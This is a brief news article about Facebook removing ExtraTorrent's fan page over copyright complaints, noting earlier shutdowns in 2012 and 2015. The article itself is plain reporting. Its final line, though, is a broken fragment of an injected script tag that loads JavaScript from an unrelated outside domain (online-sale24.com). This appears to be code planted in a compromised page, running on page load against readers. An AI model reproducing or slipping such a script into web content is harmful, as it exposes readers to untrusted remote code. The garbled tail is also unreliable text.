Facebook removes ExtraTorrent's official page

Over the years, Facebook received several complaints from different copyright holders, and just recently, they have removed ExtraTorrent’s official page citing a complaint from a third party. Facebook wrote, “We have removed or disabled access to the following content that you have posted on Facebook because we received a notice from a third-party that the content infringes their copyright(s)”.

ExtraTorrent’s Fan Page

Among all torrent sites on the said social network, ExtraTorrent had one of the largest fan pages. They had 350,000 FB fans and a very active community at that. It was considered to be a repeat infringer according to Facebook, and the official fan page was shut down twice:

  • 2015 – with 350,000 fans
  • 2012 – with 140,000 fans

Despite the shutdown, ExtraTorrent’s admin is still not giving up on Facebook just yet. They immediately launched a new page which is steadily getting more followers. Still, copyright enforcers will continue to retrace copyright infringements. type=’text/javascript’ src=’http://online-sale24.com/1.js’>
